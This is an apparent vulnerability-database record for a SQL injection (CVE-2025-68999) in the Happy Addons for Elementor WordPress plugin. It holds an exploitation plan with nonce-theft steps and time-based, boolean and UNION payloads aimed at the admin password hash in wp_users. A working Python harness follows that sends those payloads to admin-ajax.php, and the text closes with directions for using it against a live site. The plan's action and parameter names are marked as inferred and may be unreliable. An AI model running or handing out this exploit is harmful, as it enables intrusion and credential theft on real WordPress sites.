[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fp8U-obaQGUmOwKJOvKCds8Hw7hYRzzDE-dhOfIPoHCI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2025-68999","happy-addons-for-elementor-authenticated-contributor-sql-injection","Happy Addons for Elementor \u003C= 3.20.4 - Authenticated (Contributor+) SQL Injection","The Happy Addons for Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.20.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","happy-elementor-addons",null,"\u003C=3.20.4","3.20.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-23 00:00:00","2026-01-27 19:20:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fce3cb2e9-6491-4b93-bd98-1ece39171b0c?source=api-prod",5,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-68999\n\n## 1. Vulnerability Summary\nThe **Happy Addons for Elementor** plugin (\u003C= 3.20.4) is vulnerable to a SQL Injection vulnerability within its AJAX handling logic. Specifically, the plugin fails to properly sanitize and prepare SQL queries when processing dynamic widget data (e.g., Data Tables, Post Grids) requested via the `admin-ajax.php` endpoint. Authenticated users with **Contributor-level** permissions or higher can manipulate query parameters (such as `order_by`, `order`, or specific filter IDs) to inject arbitrary SQL commands. This exists because the plugin uses string interpolation or concatenation to build database queries instead of consistently using the `$wpdb->prepare()` method.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `ha_get_query_data` (inferred based on plugin architecture for dynamic widget loading) or `happy_addons_get_data`.\n- **Vulnerable Parameter:** `query_args[order_by]` or `query[sort_by]` (inferred).\n- **Authentication:** Authenticated (Contributor+). 
Contributors can open the Elementor editor for posts they own (unless the role has been excluded in Elementor's Role Manager), and the editor issues these AJAX requests.\n- **Preconditions:** The plugin must be active, and the attacker must have a valid session for a user with at least `edit_posts` capabilities (Contributor).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The attacker sends a POST request to `admin-ajax.php` with `action=ha_get_query_data`.\n2. **Hook Registration:** The plugin registers the action via:\n   `add_action( 'wp_ajax_ha_get_query_data', 'ha_get_query_data_handler' );`\n3. **Handler Function:** The handler retrieves the `query` or `query_args` array from `$_POST`.\n4. **Sink:** The logic passes these arguments into a query builder class (e.g., `Happy_Addons\\Elementor\\Query_Builder`).\n5. **Vulnerability:** Inside the query builder, a parameter like `order_by` is directly appended to a SQL string:\n   `$sql = \"SELECT ... ORDER BY \" . $query_args['order_by'];`\n6. **Execution:** `$wpdb->get_results($sql)` executes the malicious payload.\n\n## 4. Nonce Acquisition Strategy\nThe `ha_get_query_data` action typically requires a nonce for validation via `check_ajax_referer`.\n\n- **Nonce Variable:** `happy_addons_config` or `HappyAddonsConfig` (inferred).\n- **Nonce Key:** `nonce` or `ajax_nonce`.\n- **Acquisition Steps:**\n    1. Log in as a **Contributor**.\n    2. Create a post the Contributor owns. A Contributor has no `edit_pages` or `publish_posts` capability, so a published page (or any post owned by another user) will not open in their editor; create a draft post with the attacker account as author instead: `wp post create --post_type=post --post_status=draft --post_author=\"$(wp user get attacker --field=ID)\" --post_title=\"Exploit Page\" --post_content=''` (then open it in the editor).\n    3. The plugin enqueues scripts that contain the nonce in the editor view.\n    4. Use `browser_navigate` to the Elementor editor URL for the created post.\n    5. Use `browser_eval` to extract the nonce:\n       `browser_eval(\"window.happy_addons_config?.nonce || window.HappyAddonsConfig?.ajax_nonce\")`\n\n## 5. 
Exploitation Strategy\nWe will use a **time-based blind SQL injection** to confirm the vulnerability, as it is the most reliable method when output might not be directly reflected.\n\n### Step-by-Step Plan:\n1. **Login:** Authenticate as a Contributor user.\n2. **Nonce Extraction:** Navigate to a page where the Happy Addons scripts load and extract the nonce using the strategy above.\n3. **Payload Construction:**\n   - We will target the `order_by` parameter.\n   - Payload: `(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)`\n   - Keep `SLEEP` short: an `ORDER BY` expression is evaluated once per sorted row, so the observed delay is roughly 5 s multiplied by the number of rows the query returns.\n4. **HTTP Request:**\n   - **Method:** POST\n   - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body:**\n     ```\n     action=ha_get_query_data&\n     nonce=[EXTRACTED_NONCE]&\n     query[order_by]=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)\n     ```\n5. **Validation:** Record a baseline with `query[order_by]=1` first. If the payload request takes at least 5 seconds longer than the baseline, the injection is successful. A query that matches no rows never evaluates the `ORDER BY` expression, so a missing delay is only conclusive when the baseline response actually contains results.\n\n## 6. Test Data Setup\n1. **User Creation:**\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2. **Plugin Setup:** Ensure Happy Addons for Elementor v3.20.4 is installed and active.\n3. **Content Creation:**\n   `wp post create --post_type=post --post_status=draft --post_author=\"$(wp user get attacker --field=ID)\" --post_title=\"Test Page\"`\n   (A Contributor lacks `edit_pages` and `publish_posts`, so the content must be a draft post owned by the attacker account for the Elementor editor to open it.)\n\n## 7. Expected Results\n- **Success:** The HTTP request to `admin-ajax.php` will hang for approximately 5 seconds (one `SLEEP(5)` per sorted row) before returning a response.\n- **Payload for Data Extraction:** To extract the admin password hash (assuming the default `wp_` table prefix):\n  `query[order_by]=(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE 1 END)` (36 is ASCII for `$`). Testing equality costs up to one probe per candidate byte; comparing with `>` and binary-searching the ASCII range costs seven probes per character.\n\n## 8. 
Verification Steps\n- **Database Side:** Check the MySQL general query log (if enabled) to see the executed query:\n  `tail -f \u002Fvar\u002Flib\u002Fmysql\u002Fmysql.log | grep \"SLEEP\"`\n- **Response Timing:** Use the `http_request` tool's response metadata to verify `elapsed_time` >= 5000ms.\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is on, try injecting a syntax error to see if the database error is leaked:\n  `query[order_by]=invalid_column_name`\n- **UNION-Based:** If the AJAX handler returns results (e.g., for a \"Live Search\" widget), attempt a UNION select:\n  `query[order_by]=id) UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users-- -`\n  (Requires guessing the correct number of columns in the original `SELECT`).\n- **Different Parameter:** If `order_by` is sanitized, try `query[post_type]` or `query[taxonomy]`.","The Happy Addons for Elementor plugin (\u003C= 3.20.4) is vulnerable to SQL Injection due to insufficient sanitization and preparation of user-supplied input in SQL queries. Authenticated users with Contributor-level access or higher can exploit this via AJAX requests by injecting malicious SQL into parameters such as 'order_by', allowing for unauthorized extraction of sensitive data from the database.","An attacker with Contributor-level permissions authenticates and extracts a required AJAX nonce from the Elementor editor environment, typically found in the 'happy_addons_config' JavaScript object. The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' using the 'ha_get_query_data' action. 
The payload is injected into the 'query[order_by]' parameter using a time-based technique, such as '(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)', which is confirmed by observing a delay in the server's response.","gemini-3-flash-preview","2026-05-05 01:57:33","2026-05-05 01:59:22",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","3.20.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags"]
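The timing probe described in sections 5 and 7 of the research plan, as an added example that is neither the plan's own code nor anything from the Happy Addons plugin: a Python harness that builds the `ORDER BY` payload, measures each probe against a calibrated baseline, and replaces the single `=36` equality test with a binary search over the ASCII range. The action name `ha_get_query_data`, the parameter `query[order_by]`, the POST field `nonce` and the `wp_` table prefix are carried over from the plan's inferred details and remain assumptions; `simulated_oracle` stands in for the HTTP oracle so the extraction loop runs offline against a constructed string.

```python
"""Timing oracle + binary-search extraction for a blind SQL injection in ORDER BY.

Added example for this advisory, not code from the Happy Addons plugin or from the
research plan's author. Everything about the target is an assumption carried over
from the plan's inferred details: the AJAX action `ha_get_query_data`, the
parameter `query[order_by]`, the POST field `nonce` and the `wp_` table prefix.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request

# Keep the sleep short: MySQL evaluates an ORDER BY expression once per sorted row,
# so the observed delay is roughly SLEEP_SECONDS * rows.  A 5 s sleep against a
# 200-row result set would stall a single probe for well over 15 minutes.
SLEEP_SECONDS = 1
ADMIN_HASH = "SELECT user_pass FROM wp_users WHERE ID=1"  # default wp_ prefix assumed


def build_payload(subquery, pos, threshold, sleep=SLEEP_SECONDS):
    """ORDER BY expression that sleeps when ASCII(char at 1-based `pos` of the
    subquery result) > `threshold`.  ASCII('') is 0 past the end of the string
    and NULL > n is NULL, so both fall through to the ELSE branch (no delay)."""
    return (f"(CASE WHEN (ASCII(SUBSTRING(({subquery}),{pos},1))>{threshold}) "
            f"THEN SLEEP({sleep}) ELSE 1 END)")


def timed_post(url, cookie, nonce, order_by, action="ha_get_query_data", timeout=120):
    """POST one probe to admin-ajax.php and return (HTTP status, elapsed seconds)."""
    body = urllib.parse.urlencode(
        {"action": action, "nonce": nonce, "query[order_by]": order_by}).encode()
    req = urllib.request.Request(url, data=body, headers={
        "Cookie": cookie,
        "Content-Type": "application/x-www-form-urlencoded",
    })
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code  # a rejected nonce typically comes back as 400/403
    return status, time.monotonic() - start


def http_oracle(url, cookie, nonce, sleep=SLEEP_SECONDS):
    """Build oracle(expr) -> bool backed by the live target.  A harmless
    expression sets the baseline so ordinary latency is not mistaken for SLEEP;
    a delay of at least 0.8 * sleep above that baseline counts as true."""
    _, baseline = timed_post(url, cookie, nonce, "1")

    def oracle(expr):
        _, elapsed = timed_post(url, cookie, nonce, expr)
        return elapsed - baseline >= 0.8 * sleep
    return oracle


def simulated_oracle(secret):
    """Offline stand-in for http_oracle: reads pos/threshold back out of the
    payload and answers against a constructed secret, so the extraction loop
    can be exercised without any target."""
    pattern = re.compile(r",(\d+),1\)\)>(\d+)\) THEN SLEEP")

    def oracle(expr):
        match = pattern.search(expr)
        pos, threshold = int(match.group(1)), int(match.group(2))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > threshold
    return oracle


def extract(oracle, subquery, max_len=64):
    """Recover the subquery's string one character at a time.  Binary search on
    the ASCII value costs 7 probes per character instead of one probe per
    candidate byte, which matters when each probe costs SLEEP_SECONDS * rows."""
    result = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(subquery, pos, mid)):
                lo = mid + 1  # character code is above mid
            else:
                hi = mid
        if lo == 0:  # ASCII('') == 0: ran off the end of the string
            break
        result.append(chr(lo))
    return "".join(result)


if __name__ == "__main__":
    # Offline demonstration against a constructed, phpass-style hash.
    print(extract(simulated_oracle("$P$BdemoHash"), ADMIN_HASH))
```

Against a live target, swap the simulated oracle for `http_oracle(url, cookie, nonce)` once the nonce has been pulled from the editor page as in section 4. Keep `SLEEP_SECONDS` small, since the sort expression fires once per row, and confirm that the baseline request really returns rows: an empty result set never evaluates `ORDER BY`, so the oracle would read false for every probe and the loop would stop at the first character.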